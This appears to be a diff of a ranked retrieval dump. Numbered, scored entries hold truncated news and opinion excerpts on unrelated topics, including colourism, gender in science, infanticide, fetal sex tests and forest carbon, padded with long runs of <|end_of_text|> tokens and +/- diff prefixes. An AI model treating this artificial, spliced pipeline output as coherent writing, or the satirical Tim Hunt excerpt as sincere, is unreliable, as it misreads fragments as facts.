stigma he has faced he is very restless and nervous. But now after this successful operation and counselling he will lead a normal life.” - -In turn, Deepak’s father was overjoyed: “My dream has come true, now we will celebrate it after returning to my village.” - -Related news - -Chang Du has a huge growth on his face – and he's CHINese! But the disfigured 47-year-old man from Henan province can't afford medical care.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 26; Score = 337920.0 -<|begin_of_text|>Give tropical forests back to the people who live in them – and the trees will soak up your carbon for you. Above all, keep the forests out of the hands of government. So concludes a study that has tracked the fate of 80 forests worldwide over 15 years. - -Most tropical forests – from Himalayan hill forests to the Madagascan jungle – are controlled by local and national governments. Forest communities own and manage little more than a tenth. They have a reputation for trashing their trees – cutting them for timber or burning them to clear land for farming. In reality the opposite is true, according to Ashwini Chhatre of the University of Illinois at Urbana-Champaign. - -Hand it over - -In the first study of its kind, Chhatre and Arun Agrawal of the University of Michigan in Ann Arbor compared forest ownership with data on carbon sequestration, which is estimated from the size and number of trees in a forest. Hectare-for-hectare, they found that tropical forest under local management stored more carbon than government-owned forests. There are exceptions, says Chhatre, “but our findings show that we can increase carbon sequestration simply by transferring ownership of forests from governments to communities”. - -One reason may be that locals protect forests best if they own them, because they have a long-term interest in ensuring the forests’ survival. While governments, whatever their intentions, usually license destructive logging, or preside over a free-for-all in which everyone grabs what they can because nobody believes the forest will last. - -Advertisement - -The authors suggest that locals would also make a better job of managing common pastures, coastal fisheries and water supplies. They argue that their findings contradict a long-standing environmental idea, called the “tragedy of the commons”, which says that natural resources left to communal control get trashed. In fact, says Agrawal, “communities are perfectly capable of managing their resources sustainably”. - -Flawed plans - -The research calls into question UN plans to pay governments to protect forests. The climate change meeting in Copenhagen in December is likely to agree on a formula for a programme called Reduced Emissions from Deforestation and Forest Degradation. “There is a real fear that REDD will lead to dispossession of local communities [as] governments stake their claim on emissions reduction credits,” says Chhatre. - -Simon Counsell of the Rainforest Foundation UK is not surprised by the findings. “In Brazil and elsewhere, we know the most enduring forests are in indigenous reserves, -================================================================================ -Rank = 27; Score = 337920.0 +Rank = 29; Score = 152576.0 <|begin_of_text|>Women who kill their newborns usually claim to have been in denial about their pregnancies. Can you carry a child to term without realizing it? And if you do, how responsible are you for your actions? (Photo: Phil Jones/Shutterstock) @@ -501,28 +511,7 @@ ADVERTISEMENT Thanks for watching! Visit Website VERONIQUE COURJAULT SEEMED TO fit the image of an ideal mother: a caring Frenchwoman in a stable and affluent marriage with no demanding career to distract from her family. Members of the press were ================================================================================ -Rank = 28; Score = 337920.0 -<|begin_of_text|>This list has been expanded into the new book, "Wired to Create: Unravelling the Mysteries of the Creative Mind," by Carolyn Gregoire and Scott Barry Kaufman. - -Creativity works in mysterious and often paradoxical ways. Creative thinking is a stable, defining characteristic in some personalities, but it may also change based on situation and context. Inspiration and ideas often arise seemingly out of nowhere and then fail to show up when we most need them, and creative thinking requires complex cognition yet is completely distinct from the thinking process. - -Neuroscience paints a complicated picture of creativity. As scientists now understand it, creativity is far more complex than the right-left brain distinction would have us think (the theory being that left brain = rational and analytical, right brain = creative and emotional). In fact, creativity is thought to involve a number of cognitive processes, neural pathways and emotions, and we still don't have the full picture of how the imaginative mind works. - -And psychologically speaking, creative personality types are difficult to pin down, largely because they're complex, paradoxical and tend to avoid habit or routine. And it's not just a stereotype of the "tortured artist" -- artists really may be more complicated people. Research has suggested that creativity involves the coming together of a multitude of traits, behaviors and social influences in a single person. - -"It's actually hard for creative people to know themselves because the creative self is more complex than the non-creative self," Scott Barry Kaufman, a psychologist at New York University who has spent years researching creativity, told The Huffington Post. "The things that stand out the most are the paradoxes of the creative self... Imaginative people have messier minds." - -While there's no "typical" creative type, there are some tell-tale characteristics and behaviors of highly creative people. Here are 18 things they do differently. - -They daydream. - -Creative types know, despite what their third-grade teachers may have said, that daydreaming is anything but a waste of time. - -According to Kaufman and psychologist Rebecca L. McMillan, who co-authored a paper titled "Ode To Positive Constructive Daydreaming," mind-wandering can aid in the process of "creative incubation." And of course, many of us know from experience that our best ideas come seemingly out of the blue when our minds are elsewhere. - -Although daydreaming may seem mindless, a 2012 study suggested it could actually involve a highly engaged brain state -- daydreaming can lead to sudden connections and insights -================================================================================ -Rank = 29; Score = 331776.0 +Rank = 30; Score = 151552.0 <|begin_of_text|>Church leaders often worry that Sunday morning is the “most segregated day of the week.” On Sundays, churchgoers gather inside congregations that are remarkably monochromatic. Whites with whites, blacks with blacks, Latinos with Latinos, Koreans with Koreans, and so on. @@ -549,269 +538,285 @@ Because safety matters so much, established congregations have an even larger di In too many congregations, people fight over trivialities. They bully ================================================================================ -Rank = 30; Score = 329728.0 -<|begin_of_text|>Giriraj Singh’s remarks about “white-skinned” Sonia Gandhi shocked a lot of people this week. Tasteless though the comment was, it did bring out a prevalent Indian attitude about the colour of one’s skin. Indeed, one thing that baffles me about India is our love for fair skin. Not unlike many African and Asian countries, Indians too obsess about having a lighter skin colour, consider people with lighter skin as more beautiful and, in the worst case, even ascribe a higher status to them. From the multi-million-dollar fairness products industry to the fact that all children in our baby product ads are fair, one no longer needs to debate that Indians love lighter skin. We do, and that might have just been one of those many Indian quirks had it not had harmful effects on our society. Indians are not fair-skinned on an average, and thus millions have a complex about their skin colour. +Rank = 31; Score = 151552.0 +<|begin_of_text|>Fetal sex tests have a few medical applications, allowing couples with histories of rare sex-linked disorders to avoid costly and invasive genetic testing if they learn they are expecting the other sex. But for most couples, the tests, which are unregulated, simply answer the boy-or-girl question weeks earlier than ultrasound, and in a less invasive and safer way than amniocentesis. -Women, in particular, bear the worst of it. I remember my darker-toned cousins being told to not drink tea while growing up (because tea makes you black, as per Indian home science, never mind the English never turned dark despite fighting wars for tea), or to study harder because they were dark and hence it would not be easy to marry them off. Apart from judgments about looks, there is something more onerous when it comes to skin colour and Indians. Dark-skinned people get fewer opportunities in India. This is not racism, but is sometimes referred to as colourism or pigmentocracy. Fair-skinned people are more likely to be hired in certain jobs (when was the last time you saw a dark-skinned flight attendant on an Indian airline?). +“Seven weeks is a different time in pregnancy,” said Dr. James Egan, a professor of obstetrics and gynecology at the University of Connecticut Health Center who was a co-author of a study on sex selection with Dr. Chapman and others. “Women haven’t had the ultrasound where you see the fetus that looks like a baby. Many people don’t even know that a woman is pregnant. And you can have a medical termination,” using pills like RU-486, which can be used at home discreetly before 10 weeks of pregnancy. -We must address this. Not merely in lip service or by raising your voice with catchy slogans for Facebook, but by honestly seeing what is the root cause driving all this. +There is evidence that some Americans want to choose their babies’ sex. At the Fertility Institutes, a set of clinics in Los Angeles, New York and Guadalajara, Mexico, 85 percent of roughly 500 couples each year seek sex selection, although three-quarters of them come from overseas, said Dr. Jeffrey Steinberg, the medical director. -The key reason why this happens is the associations related to colours, and also to people of a particular colour. +“It’s jumped over the past four years,” said Dr. Steinberg, whose clinics determine sex through pre-implantation genetic diagnosis, an embryo screening that also detects genetic disorders. He said that “if a woman calls to make the appointment, the couple almost always wants a female. If a man calls, they almost always want a male.” -First, is it just the intrinsic colours? White. Black. What do these colours signify to you? White is often used in the context of clarity, purity and cleanliness. Black is used to describe the opposite. White is clean, black is dirt. Is some of this carried through when we refer to the same colours in the context of our skin? +But clinics and some ethicists say this type of sex selection is more acceptable because it occurs before embryos are implanted, before pregnancy. -Of course, not everything black is seen as unaesthetic. Thick and shiny black hair is associated with youth, health and beauty. Images of dark brown chocolate, associated with deliciousness, can make one’s mouth water -================================================================================ -Rank = 31; Score = 325632.0 -<|begin_of_text|>Robots, too, can be bad drivers. As the world prepares for the coming future of driverless cars, there are bound to be a few accidents. Launched this summer, a trial of PostBus driverless shuttles in Sion, Switzerland was expected to continue through October 2017. Instead, one of the two shuttles hit a parked van earlier this week, sending the whole trial into a screeching halt. +“We’re trying to prevent the abortion,” said Dr. Jamie Grifo, program director for New York University’s Fertility Center. His and other clinics typically allow sex selection for couples with two or more children, parents interested in “family balancing,” adding a child of the opposite sex. -Test operation momentarily stopped in Sion. Because an autonomous shuttle touched the open tailgate of a parked van in Sion on 21 September 2016, PostBus has decided to interrupt the test operation with the Smart Shuttle for the time being. Nobody got hurt. There was a minor property damage. PostBus and the vehicle manufacturers are continuing to analyse the causes of the incident and take the necessary measures. +“For someone who has two girls and wants to have a boy, so each sibling can grow up with brother and sister, what’s wrong with that?” Dr. Grifo said. -The problem echoes that of previous driverless car accidents, where sensors were blind to an unusual circumstance. In February, a Google driverless car was ruled at fault in a crash, as it changed into a lane prematurely and collided with a bus that did not see it signaling. When a Tesla car on autopilot crashed and killed its owner in the United States, it sparked a Federal investigation. The Tesla crash, where the car collided with a trailer crossing the road, was likely because the car’s sensors couldn’t tell the white side of a trailer apart from the blank space of the sky, and failed to stop in time. +Advertisement Continue reading the main story -So it is with the Swiss shuttle. The slow-moving vehicles (traveling no faster than 12 mph) can carry up to 11 passengers and are monitored remotely. The crash, as it was, appears to be minor, the kind of error that would be wholly unsurprising with a student driver, yet stands out thanks to the technology involved.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Still, the cost and commitment of the fertility process makes such sex selection cases relatively unusual. Fetal DNA tests, costing between $250 and $350, are more affordable. + +Anti-abortion groups are incorporating sex selection in legislative agendas. Arizona and Oklahoma recently passed laws banning sex-selected abortion ================================================================================ -Rank = 32; Score = 325632.0 -<|begin_of_text|>Tech gadgets' plastic and metal bodies can be pretty tiresome, offering little personality and warmth - especially considering how integrated they are with our lives. Recently, wood has stepped in to fill the unnatural void. One of the oldest known materials used to build things, wood is warm, timeless and beautiful. Its durability and unique fingerprint of grain patterns also make this an ideal material to enclose a tech gadget in. +Rank = 32; Score = 150528.0 +<|begin_of_text|>Australia’s Jill Rathborne may have added a new term to the already crowded field of politically correct academese: “micro-inequity.” -Above is an image of the Maple Phone, designed by Hyun Jin Yoon and Eun Hak Lee, who have won the Silver award at the International Design Excellence Awards 2008. +Not encouraged to study science while growing up, Rathborne says she was told by her teachers that college physics classes “would be too difficult.” -Other wooden phones have been designed, that are interesting to compare. I think the Maple Phone is the most elegant, though. +She admits, however, that none of the teachers she had asked had taken physics at college, “so that might have influenced their opinions.” -Continue for more images of the Maple Phone and other unique wooden phones ><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 33; Score = 321536.0 -<|begin_of_text|>Women are so fed up with male entitlement that they’ve not only begun coining terms to classify it—“manspreading” or “mansplaining,” for example—but they’ve also started devising social experiments to find out what happens when women stop being polite and start acting like, well, men. +“That conversation didn’t explicitly mention my gender, but I do wonder if they gave that same advice to male students that had similar abilities to me (I was in the top few percent of my high school physics class),” she says. -In an unscientific (but revealing) experiment launched on Friday, Tumblr user Claire Boniface announced that whenever she received a compliment from a male stranger online, she’d agree with him rather than simply ignore the comment or accept it with a gracious “thank you.” +The Guardian reports: -Like many other girls and women online, Boniface was sick of getting criticized by strangers who complimented her photos and then expected a conversation in return. +The problem is these biases are often subtle. It’s these micro-inequities that do the most damage – the small, seemingly inconsequential ways in which people are excluded or discounted that, over time, erode confidence, value and worth and reinforce a culture that is not inclusive. BD: Has there been a moment in your career when you’ve been uncomfortably reminded of your gender? JR: It’s that thought in the back of your mind: am I getting this opportunity because I’m qualified, or because I’m female? Hopefully the former, but perhaps sometimes it might be the latter. I’d like to be known as a scientist, not a female scientist – maybe, if possible, a good scientist. The relevant point here is that typically we wouldn’t ever ask a man this same question when asking him about his career. BD: Have you been encouraged to modify behavior in masculine environments? JR: Astronomy is a very male-dominated field – this is evident in the office, at conferences, in committee memberships. I can’t recall ever being actively told to modify my behaviour, [but] having said that, it takes a certain resilience and personality to be comfortable and successful when you’re a minority in your field. You often need a pretty thick skin, you can’t be easily offended. -“If a guy messages me I usually don’t reply because most of the time they are complete strangers to me,” 18-year-old Gweneth Bateman, a British teenager who undertook the Tumblr-based social experiment, told BuzzFeed News. “When they don’t get a reply out of me it usually ends up with them calling me ‘rude’ or a ‘bitch.’ ” +So, even though none of her teachers made any point about her being female (and who, by the way, probably had a very good idea about her academic abilities), and though she can’t recall any “active” request to change her behavior in the male-dominated arena, it’s just “that thought in the back of [her] mind …” -So Bateman flipped the table, responding to texts about her “gorgeous eyes” with affirmations such as “Thank you, I know.” As predicted, the men on the other side of the screen failed the experiment miserably, berating her for her confidence and then retracting the compliment altogether. Bateman cites it as an example of the way men are uncomfortable “when women own their own awesomeness.” +Not to mention, Rathborne bemoans a “non-inclusive culture” … yet wonders if she got her position merely because of her gender? -In part two of the experiment, posted to her Twitter account Tuesday, Bateman said she received an equally hateful reaction from men even when she politely agreed with them. The experiment has called attention to the way women’s behavior is judged by different standards from men’s. “If you reject a compliment you’re ‘attention seeking’ but if you accept it you’re ‘vain’ so [you] really can’t win either way,” she tweeted Monday. +Wow. -Bateman and Boniface weren’t the only women who recently went to great lengths to give men a taste of their own privilege. In November of last year, New York–based labor organizer Beth Breslaw decided that rather than intuitively moving out of the way for people in her path, she’d take a more masculine approach and continue walking, with no regard for other pedestrians. +Read the full article. -She got the idea from a friend who initiated the experiment after hearing that men were less likely than women to make room for others on a crowded street. The experiment was not only startling +Like The College Fix ================================================================================ -Rank = 34; Score = 317440.0 -<|begin_of_text|># Don’t blow out candles on your birthday. It’s “western culture” and needs to be shunned. Instead, wear “swadeshi clothes” this day, do a havan, pray to the ishtadev, feed cows. - -Advertising - -# Drawing a map of India? Make sure you include Pakistan, Afghanistan, Nepal, Bhutan, Tibet, Bangladesh, Sri Lanka and Myanmar. These are part of undivided India or “Akhand Bharat”. +Rank = 33; Score = 150528.0 +<|begin_of_text|>FOR ABONNENTER -# Include August 14, Pakistan’s Independence Day, in the list of national holidays. This day should be celebrated as “Akhand Bharat Smriti Divas”. +Vi deler samfundet op i indvandrere og danskere, men opdelingen skal være mænd og kvinder. -These are moral prescriptions from books authored by Dina Nath Batra, convenor of Shiksha Bachao Andolan Samiti, that have now become compulsory reading in government schools in Gujarat. On June 30, the state government issued a circular directing more than 42,000 primary and secondary government schools across the state to make a set of nine books by Batra, translated from Hindi to Gujarati, part of the curriculum’s “supplementary literature”. +Ikke i indvandrere og danskere. Når der tales om problemer i samfundet, så er det problemer blandt den mandlige del af befolkningen. -Advertising +Nu er der ikke problemer med alle mænd, ligesom det ikke er alle indvandrere, der er kriminelle og utilpassede. Selv om man nogle gange kan få den opfattelse i pressen, er det selvfølgelig heller ikke alle mænd, der er kriminelle og utilpassede, men det er blandt den mandlige del af befolkningen, de store samfundsmæssige og sociale problemer findes. -Batra’s civil suit earlier this year had led to the pulping of American scholar Wendy Doniger’s book on Hinduism. He had also sent a legal notice to another publisher about a book on modern Indian history which led the publisher to begin a review of some of its books, including one on +Vi hører ikke om det – det er et usynligt problem – men ja, vi ved da godt at en pædofil er en mand, at voldtægt begås af mænd, men det understreges ikke. -sexual violence during riots in Ahmedabad. +En notits fra avisen siger »færre kræves fængslet, antallet af unge indvandrere, der ender i grundlovsforhør, falder«. Hvem er det, der ender i grundlovsforhør? Det er mænd! Uanset hvilken etnisk kategori de tilhører, så er det mænd, det fremhæves bare ikke. Vi hører ikke om det. -The circular issued by the Gujarat State School Textbook Board (GSSTB) read, “These books on supplementary literature are aimed at imparting quality education. They will be provided free of cost to all government primary and secondary schools, public libraries and will be also available at GSSTB, Gandhinagar, for individuals interested in these books. These are to be incorporated from this academic session.” +Hvad med overskriften fra Politiken tirsdag 29. august: ’Hård kurs mod unge spiller fallit’. Hvem er de unge. Hvis man læser artiklen, fremgår det, at det er unge mænd. Man kan tro, at problemet er blandt alle unge, men det er det ikke, det er unge mænd indsatsen er rettet mod, jo selvfølgelig er der også piger, men de udgør en forsvindende lille del af problemet. -On March 4, Gujarat Education Minister Bhupendrasinh Chudasama released the set of nine books — Shikhan nu Bhartiyakaran, Tejomay Bharat, Prernadeep I, II, III and IV, Vidyalaya: Pravitiyon nu Ghar, Shikhsan ma Triveni and Vedic Ganit. +Kriminalitet er et kønsbestemt problem, et mandeproblem. En ekstrem mandlig adfærd. -On page 59 of the book Shikhan nu Bhartiyakaran (Indianisation of Education), under the chapter Samajik Chetna (social awakening), the author says, “Birthdays should be celebrated by shunning the western culture of blowing candles. Instead, we +Der skrives om vold, men det er ikke bare vold, nej det er mænds vold, mænds vold mod kvinder, børn og andre mænd ================================================================================ -Rank = 35; Score = 315392.0 -<|begin_of_text|>I’m a female scientist, and I agree with Tim Hunt. - -Allie Rubin Blocked Unblock Follow Following Jun 13, 2015 +Rank = 34; Score = 147456.0 +<|begin_of_text|>I am hideously white, and not a man but “male”. Being over 50, I suffer the added failing of being disgustingly old. Such are the routine humiliations of my group. The BBC was called hideously white by its former boss Greg Dyke, and the West End stage hideously white by Andrew Lloyd Webber. This week the Football Association was dismissed by critics as a bunch of “old white men”. Note that it is not the BBC or the theatre that is hideous, but their whiteness. -Nobel Prize winner Sir Tim Hunt recently caused a stir when he argued that male and female scientists should work independently, because women are a distraction to men in the lab. At a conference, he was quoted as saying, “Let me tell you about my trouble with girls… three things happen when they are in the lab… You fall in love with them, they fall in love with you and when you criticize them, they cry.” +Blame the identity apostles – they led us down this path to populism | Simon Jenkins Read more -As improbable as it might sound, I am a female scientist, and I agree with Tim Hunt. +Fashion in collective abuse seeks comfort in crowds. In choosing “pale, stale males” (PSMs) for ritual contempt, identity politics has found a target that it hopes will confess its “guilt”. More recently the epithet “failed” has been added to explain the Brexit/Trump voters. These PSMs are further damned by being uneducated “left-behinders”, and therefore also dumb. They were thought so dumb it was suggested they vote again on Brexit, for having got it wrong first time. -First of all, Sir Tim’s comments are based on his personal experiences, and are therefore incontrovertible. Three hundred and fifty years ago, Isaac Newton saw an apple fall and decided that gravity existed. Three weeks ago, Tim Hunt saw a woman cry and decided that all women are unfit to be scientists. Science is based on observations, which are the same thing as universal proof. Even I know that, and I’m just a woman whose brain is filled to capacity with yoga poses and recipes for gluten-free organic soap. Once, I was lured into a trap in the woods because I followed a trail of Sex and the City DVDs for three miles into a covered pit. Do you really think I could do something as complicated as thinking about science? +Were someone such as I to take offence, demand redress or “protected space”, I would be bidden to shut up, get a life and not be so sensitive. I might plead, with Shylock: “Hath not a [pale, stale male] hands, organs, dimensions, senses, affections, passions? If you prick us, do we not bleed?” I might turn to Kant and universalise the judgment. What if I were to follow “hideously” with black, female, Jewish, Arab, obese, disabled or Welsh? Is the representation of black footballers in the Premier League (as opposed to the Football Association) “hideously black”? -Second, Tim Hunt is correct in asserting that women are distracting to men in a lab setting, which greatly affects their productivity. Last month, my labmates and I had to burn our female coworker at the stake for witchcraft because we saw her holding an unwrapped tampon. Between building the stake, lighting an adequate fire, and waiting for her to die, we lost an entire day that we could otherwise have spent working. I make every effort to not distract my male colleagues; sometimes I have to work on my astrology charts from home when I’m menstruating or have leprosy, just so I can let the men in my lab focus on doing real science. It’s a small sacrifice I make that keeps morale in the lab way up. +The reality is that PMSs are expected to take all this in their stride. They were, after all, the old hegemons. They dished out discrimination; now they should accept a taste of their own medicine. (Or will someone protest that this is patronising: why should PSMs refuse to take offence, as does everyone else?) This is, of course, fair enough – except two wrongs do not make a right. Besides, identity liberalism is surely more than the politics of tit-for-tat. It is a straining after a sort of equality of treatment. -Tim Hunt also mentions that men and women are constantly falling in love with each other within the lab. This is true; I used to identify as homosexual before working with a group of bearded men and a set of phallic pipettes turned me straight. Once that happened, I couldn’t stop falling in love with every man I met. One time I fell +I have no quarrel with this week’s accusations levelled at the Football Association ================================================================================ -Rank = 36; Score = 311296.0 -<|begin_of_text|>Lonely individuals may decode social cues well but have difficulty putting such skills to use precisely when they need them--in social situations. In four studies, we examined whether lonely people choke under social pressure by asking participants to complete social sensitivity tasks framed as diagnostic of social skills or nonsocial skills. Across studies, lonely participants performed worse than nonlonely participants on social sensitivity tasks framed as tests of social aptitude, but they performed just as well or better than the nonlonely when the same tasks were framed as tests of academic aptitude. Mediational analyses in Study 3 and misattribution effects in Study 4 indicate that anxiety plays an important role in this choking effect. This research suggests that lonely individuals may not need to acquire social skills to escape loneliness; instead, they must learn to cope with performance anxiety in interpersonal interactions. +Rank = 35; Score = 146432.0 +<|begin_of_text|>MEPs have revealed they want boys to learn about traditionally ‘female’ activities and should be taught domestic work and care at school. -© 2015 by the Society for Personality and Social Psychology, 